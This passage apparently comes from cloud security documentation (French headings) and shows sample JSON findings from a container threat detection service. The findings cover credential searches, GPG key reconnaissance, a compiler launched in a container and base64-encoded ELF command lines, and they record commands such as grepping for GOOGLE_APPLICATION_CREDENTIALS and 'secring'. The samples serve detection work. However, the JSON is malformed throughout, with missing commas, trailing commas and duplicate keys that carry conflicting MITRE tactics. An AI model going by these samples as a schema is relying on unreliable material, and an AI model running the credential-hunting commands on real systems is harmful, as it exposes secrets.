}, "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID" }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "ktd_steganography_tool_detected" }, "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": { "seconds": "1729291973", "nanos": 687426149 } } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1001/002/" }, "virustotalIndicatorQueryUri": [ { "displayName": "VirusTotal File Link", "url": "https://www.virustotal.com/gui/file/430cdef8f363efe8b7fe0ce4af583b202b77d89f0ded08e3b77ac6aca0a0b304/detection" } ], "relatedFindingUri": {} } }, }
Accès aux identifiants : trouver des identifiants Google Cloud
{ "finding": { "access": {}, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Credential Access: Find Google Cloud Credentials", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2024-06-17T18:50:13Z" } ], "createTime": "2025-01-21T19:55:22.017Z", "database": {}, "eventTime": "2025-01-21T19:55:21.762Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "name": "CONTAINER_NAME", "ns": "NAMESPACE", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2025-01-21T19:55:19Z" } ] } ], "nodes": [ { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID" } ] }, "logEntries": [ { "cloudLoggingEntry": { "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": "2025-01-21T19:55:19.654640277Z" } } ], "mitreAttack": { "primaryTactic": "CREDENTIAL_ACCESS", "primaryTechniques": [ "UNSECURED_CREDENTIALS", "PRIVATE_KEYS" ] "additionalTactics": [ "COLLECTION", "DISCOVERY" ] "additionalTechniques": [ "AUTOMATED_COLLECTION", "CREDENTIALS_FROM_PASSWORD_STORES", "BASH_HISTORY" ] }, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "mitreAttack": { "primaryTactic": "PRIVILEGE_ESCALATION", "primaryTechniques": [ "ESCAPE_TO_HOST" ] }, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "muteUpdateTime": "1970-01-01T00:00:00Z", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "\"/bin/grep\"", "size": "219456", "sha256": "c0a251c2e9a59e9e5db752c14857e51e17c0771af338b602bb9ccadc23a2ee7f", "hashedSize": "219456", "partiallyHashed": false, "diskPath": {} }, "script": { "size": "0", "hashedSize": "0", "partiallyHashed": false, "diskPath": {} }, "args": [ "\"grep\"", "\"GOOGLE_APPLICATION_CREDENTIALS\"" ], "argumentsTruncated": false, "envVariables": [ { "name": "\"HOSTNAME\"", "val": "\"CONTAINER_NAME\"" }, ], "pid": "9", "parentPid": "1" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "securityPosture": {}, "severity": "LOW", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "displayName": "CLUSTER_ID", "type": "google.container.Cluster", "cloudProvider": "GOOGLE_CLOUD_PLATFORM", "service": "container.googleapis.com", "location": "ZONE", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "parentDisplayName": "PROJECT_ID", "folders": [ { "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_ID" } ], "organization": "organizations/ORGANIZATION_ID" }, "resourcePath": { "nodes": [ { "nodeType": "GCP_PROJECT", "id": "projects/PROJECT_ID", "displayName": "PROJECT_ID" }, { "nodeType": "GCP_FOLDER", "id": "folders/FOLDER_NUMBER", "displayName": "FOLDER_ID" }, { "nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID" } ] }, "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID" }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "ktd_find_gcp_credentials" }, "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": { "seconds": "1729291973", "nanos": 687426149 } } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/tactics/TA0006/" }, "virustotalIndicatorQueryUri": [ { "displayName": "VirusTotal File Link", "url": "https://www.virustotal.com/gui/file/c0a251c2e9a59e9e5db752c14857e51e17c0771af338b602bb9ccadc23a2ee7f/detection" } ], "relatedFindingUri": {} } }, }
Accès aux identifiants : reconnaissance des clés GPG
{ "finding": { "access": {}, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Credential Access: GPG Key Reconnaissance", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2024-06-17T18:50:13Z" } ], "createTime": "2025-01-21T19:55:22.017Z", "database": {}, "eventTime": "2025-01-21T19:55:21.762Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "name": "CONTAINER_NAME", "ns": "NAMESPACE", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2025-01-21T19:55:19Z" } ] } ], "nodes": [ { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID" } ] }, "logEntries": [ { "cloudLoggingEntry": { "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": "2025-01-21T19:55:19.654640277Z" } } ], "mitreAttack": {}, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "mitreAttack": { "primaryTactic": "CREDENTIAL_ACCESS", "primaryTechniques": [ "UNSECURED_CREDENTIALS", "PRIVATE_KEYS" ] "additionalTactics": [ "DISCOVERY", "RECONNAISSANCE" ] }, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "muteUpdateTime": "1970-01-01T00:00:00Z", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "\"/bin/grep\"", "size": "219456", "sha256": "c0a251c2e9a59e9e5db752c14857e51e17c0771af338b602bb9ccadc23a2ee7f", "hashedSize": "219456", "partiallyHashed": false, "diskPath": {} }, "script": { "size": "0", "hashedSize": "0", "partiallyHashed": false, "diskPath": {} }, "args": [ "\"grep\"", "\"secring\"" ], "argumentsTruncated": false, "envVariables": [ { "name": "\"HOSTNAME\"", "val": "\"CONTAINER_NAME\"" }, ], "pid": "9", "parentPid": "1" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "securityPosture": {}, "severity": "CRITICAL", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "displayName": "CLUSTER_ID", "type": "google.container.Cluster", "cloudProvider": "GOOGLE_CLOUD_PLATFORM", "service": "container.googleapis.com", "location": "ZONE", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "parentDisplayName": "PROJECT_ID", "folders": [ { "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_ID" } ], "organization": "organizations/ORGANIZATION_ID" }, "resourcePath": { "nodes": [ { "nodeType": "GCP_PROJECT", "id": "projects/PROJECT_ID", "displayName": "PROJECT_ID" }, { "nodeType": "GCP_FOLDER", "id": "folders/FOLDER_NUMBER", "displayName": "FOLDER_ID" }, { "nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID" } ] }, "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID" }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "ktd_gpg_key_reconnaissance" }, "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": { "seconds": "1729291973", "nanos": 687426149 } } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/tactics/TA0006/" }, "virustotalIndicatorQueryUri": [ { "displayName": "VirusTotal File Link", "url": "https://www.virustotal.com/gui/file/c0a251c2e9a59e9e5db752c14857e51e17c0771af338b602bb9ccadc23a2ee7f/detection" } ], "relatedFindingUri": {} } }, }
Accès aux identifiants : rechercher des clés privées ou des mots de passe
{ "finding": { "access": {}, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Credential Access: Search Private Keys or Passwords", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2024-06-17T18:50:13Z" } ], "createTime": "2025-01-21T19:55:22.017Z", "database": {}, "eventTime": "2025-01-21T19:55:21.762Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "name": "CONTAINER_NAME", "ns": "NAMESPACE", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2025-01-21T19:55:19Z" } ] } ], "nodes": [ { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID" } ] }, "logEntries": [ { "cloudLoggingEntry": { "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": "2025-01-21T19:55:19.654640277Z" } } ], "mitreAttack": {}, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "mitreAttack": { "primaryTactic": "PRIVILEGE_ESCALATION", "primaryTechniques": [ "ESCAPE_TO_HOST" ] }, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "muteUpdateTime": "1970-01-01T00:00:00Z", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "INTERPRETER", "size": "147176", "sha256": "INTERPRETER_SHA_256", "hashedSize": "147176", "partiallyHashed": false, "diskPath": {} }, "script": { "size": "0", "hashedSize": "0", "partiallyHashed": false, "diskPath": {} }, "args": [ "INTERPRETER", "ARG" ], "argumentsTruncated": false, "envVariables": [ { "name": "\"KUBERNETES_SERVICE_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT\"", "val": "\"tcp://34.118.224.1:443\"" }, { "name": "\"HOSTNAME\"", "val": "\"ktd-test-search-private-keys-or-passwords-ba379a7c2168db11\"" }, { "name": "\"HOME\"", "val": "\"/root\"" }, { "name": "\"GPG_KEY\"", "val": "\"7169605F62C751356D054A26A821E680E5FA6305\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"", "val": "\"34.118.224.1\"" }, { "name": "\"PATH\"", "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"", "val": "\"tcp\"" }, { "name": "\"LANG\"", "val": "\"C.UTF-8\"" }, { "name": "\"PYTHON_VERSION\"", "val": "\"3.12.6\"" }, { "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP\"", "val": "\"tcp://34.118.224.1:443\"" }, { "name": "\"KUBERNETES_SERVICE_HOST\"", "val": "\"34.118.224.1\"" }, { "name": "\"PWD\"", "val": "\"/\"" } ], "pid": "9", "parentPid": "1" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "securityPosture": {}, "severity": "LOW", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "displayName": "CLUSTER_ID", "type": "google.container.Cluster", "cloudProvider": "GOOGLE_CLOUD_PLATFORM", "service": "container.googleapis.com", "location": "ZONE", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "parentDisplayName": "PROJECT_ID", "folders": [ { "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_ID" } ], "organization": "organizations/ORGANIZATION_ID" }, "resourcePath": { "nodes": [ { "nodeType": "GCP_PROJECT", "id": "projects/PROJECT_ID", "displayName": "PROJECT_ID" }, { "nodeType": "GCP_FOLDER", "id": "folders/FOLDER_NUMBER", "displayName": "FOLDER_ID" }, { "nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID" } ] }, "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID" }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "ktd_search_private_keys_or_passwords" }, "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": { "seconds": "1729291973", "nanos": 687426149 } } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1552/001/" }, "virustotalIndicatorQueryUri": [ { "displayName": "VirusTotal File Link", "url": "https://www.virustotal.com/gui/file/430cdef8f363efe8b7fe0ce4af583b202b77d89f0ded08e3b77ac6aca0a0b304/detection" } ], "relatedFindingUri": {} } }, }
Defense Evasion : Lancer un outil de compilation de code dans un conteneur (aperçu)
{ "finding": { "access": {}, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Defense Evasion: Launch Code Compiler Tool In Container", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2024-06-17T18:50:13Z" } ], "createTime": "2025-01-21T19:55:22.017Z", "database": {}, "eventTime": "2025-01-21T19:55:21.762Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "name": "CONTAINER_NAME", "ns": "NAMESPACE", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2025-01-21T19:55:19Z" } ] } ], "nodes": [ { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID" } ] }, "logEntries": [ { "cloudLoggingEntry": { "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": "2025-01-21T19:55:19.654640277Z" } } ], "mitreAttack": { "primaryTactic": "DEFENSE_EVASION", "primaryTechniques": [ "OBFUSCATED_FILES_OR_INFO" ], "additionalTactics": [ "RESOURCE_DEVELOPMENT", "EXECUTION", "CREDENTIAL_ACCESS" ], "additionalTechniques": [ "STAGE_CAPABILITIES", "SOFTWARE_DEPLOYMENT_TOOLS", "UNSECURED_CREDENTIALS" ] }, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "muteUpdateTime": "1970-01-01T00:00:00Z", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "INTERPRETER", "size": "147176", "sha256": "INTERPRETER_SHA_256", "hashedSize": "147176", "partiallyHashed": false, "diskPath": {} }, "script": { "size": "0", "hashedSize": "0", "partiallyHashed": false, "diskPath": {} }, "args": [ "INTERPRETER", "ARG" ], "argumentsTruncated": false, "envVariables": [ { "name": "\"KUBERNETES_SERVICE_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT\"", "val": "\"tcp://34.118.224.1:443\"" }, { "name": "\"HOSTNAME\"", "val": "\"ktd-test-launch-code-compiler-ba379a7c2168db11\"" }, { "name": "\"HOME\"", "val": "\"/root\"" }, { "name": "\"GPG_KEY\"", "val": "\"7169605F62C751356D054A26A821E680E5FA6305\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"", "val": "\"34.118.224.1\"" }, { "name": "\"PATH\"", "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"", "val": "\"tcp\"" }, { "name": "\"LANG\"", "val": "\"C.UTF-8\"" }, { "name": "\"PYTHON_VERSION\"", "val": "\"3.12.6\"" }, { "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP\"", "val": "\"tcp://34.118.224.1:443\"" }, { "name": "\"KUBERNETES_SERVICE_HOST\"", "val": "\"34.118.224.1\"" }, { "name": "\"PWD\"", "val": "\"/\"" } ], "pid": "9", "parentPid": "1" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "securityPosture": {}, "severity": "LOW", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "displayName": "CLUSTER_ID", "type": "google.container.Cluster", "cloudProvider": "GOOGLE_CLOUD_PLATFORM", "service": "container.googleapis.com", "location": "ZONE", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "parentDisplayName": "PROJECT_ID", "folders": [ { "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_ID" } ], "organization": "organizations/ORGANIZATION_ID" }, "resourcePath": { "nodes": [ { "nodeType": "GCP_PROJECT", "id": "projects/PROJECT_ID", "displayName": "PROJECT_ID" }, { "nodeType": "GCP_FOLDER", "id": "folders/FOLDER_NUMBER", "displayName": "FOLDER_ID" }, { "nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID" } ] }, "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID" }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "ktd_launch_code_compiler_tool_in_container" }, "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": { "seconds": "1729291973", "nanos": 687426149 } } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1027/004/" }, "virustotalIndicatorQueryUri": [ { "displayName": "VirusTotal File Link", "url": "https://www.virustotal.com/gui/file/430cdef8f363efe8b7fe0ce4af583b202b77d89f0ded08e3b77ac6aca0a0b304/detection" } ], "relatedFindingUri": {} } }, }
Contournement des défenses : ligne de commande avec fichier ELF en base64
{ "finding": { "access": {}, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Defense Evasion: Base64 ELF File Command Line", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2024-06-17T18:50:13Z" } ], "createTime": "2025-01-21T19:55:22.017Z", "database": {}, "eventTime": "2025-01-21T19:55:21.762Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "name": "CONTAINER_NAME", "ns": "NAMESPACE", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2025-01-21T19:55:19Z" } ] } ], "nodes": [ { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID" } ] }, "logEntries": [ { "cloudLoggingEntry": { "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": "2025-01-21T19:55:19.654640277Z" } } ], "mitreAttack": {}, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "mitreAttack": { "primaryTactic": "DEFENSE_EVASION", "primaryTechniques": [ "OBFUSCATED_FILES_OR_INFO", "DEOBFUSCATE_DECODE_FILES_OR_INFO" ], "additionalTactics": [ "EXECUTION" ], "additionalTechniques": [ "COMMAND_AND_SCRIPTING_INTERPRETER", "UNIX_SHELL" ] }, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "muteUpdateTime": "1970-01-01T00:00:00Z", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "\"/usr/bin/base64\"", "size": "39096", "sha256": "a51595201def5bde3c47d68c8e8dda31f4e424293f2a5eefb00e47f2db0c2d84", "hashedSize": "39096", "partiallyHashed": false, "diskPath": {} }, "script": { "size": "0", "hashedSize": "0", "partiallyHashed": false, "diskPath": {} }, "args": [ "\"base64\"", "\"-d\"", "\"f0VMRgIB\"" ], "argumentsTruncated": false, "envVariables": [ { "name": "\"HOSTNAME\"", "val": "\"CONTAINER_NAME\"" }, ], "pid": "9", "parentPid": "1" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "securityPosture": {}, "severity": "MEDIUM", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "displayName": "CLUSTER_ID", "type": "google.container.Cluster", "cloudProvider": "GOOGLE_CLOUD_PLATFORM", "service": "container.googleapis.com", "location": "ZONE", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "parentDisplayName": "PROJECT_ID", "folders": [ { "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_ID" } ], "organization": "organizations/ORGANIZATION_ID" }, "resourcePath": { "nodes": [ { "nodeType": "GCP_PROJECT", "id": "projects/PROJECT_ID", "displayName": "PROJECT_ID" }, { "nodeType": "GCP_FOLDER", "id": "folders/FOLDER_NUMBER", "displayName": "FOLDER_ID" }, { "nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID" } ] }, "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID" }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "ktd_base64_elf_file_cmdline" }, "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": { "seconds": "1729291973", "nanos": 687426149 } } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/tactics/TA0005/" }, "virustotalIndicatorQueryUri": [ { "displayName": "VirusTotal File Link", "url": "https://www.virustotal.com/gui/file/a51595201def5bde3c47d68c8e8dda31f4e424293f2a5eefb00e47f2db0c2d84/detection" } ], "relatedFindingUri": {} } }, }
Contournement des défenses : ligne de commande avec fichier ELF en base64
{ "finding": { "access": {}, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Defense Evasion: Base64 ELF File Command Line", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2024-06-17T18:50:13Z" } ], "createTime": "2025-01-21T19:55:22.017Z", "database": {}, "eventTime": "2025-01-21T19:55:21.762Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "name": "CONTAINER_NAME", "ns": "NAMESPACE", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2025-01-21T19:55:19Z" } ] } ], "nodes": [ { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID" } ] }, "logEntries": [ { "cloudLoggingEntry": { "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": "2025-01-21T19:55:19.654640277Z" } } ], "mitreAttack": {}, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "mitreAttack": { "primaryTactic": "DEFENSE_EVASION", "primaryTechniques": [ "OBFUSCATED_FILES_OR_INFO", ], "additionalTactics": [ "EXECUTION" ], "additionalTechniques": [ "DEOBFUSCATE_DECODE_FILES_OR_INFO" "COMMAND_AND_SCRIPTING_INTERPRETER", "UNIX_SHELL" ] }, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "muteUpdateTime": "1970-01-01T00:00:00Z", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "\"/usr/bin/base64\"", "size": "39096", "sha256": "a51595201def5bde3c47d68c8e8dda31f4e424293f2a5eefb00e47f2db0c2d84", "hashedSize": "39096", "partiallyHashed": false, "diskPath": {} }, "script": { "size": 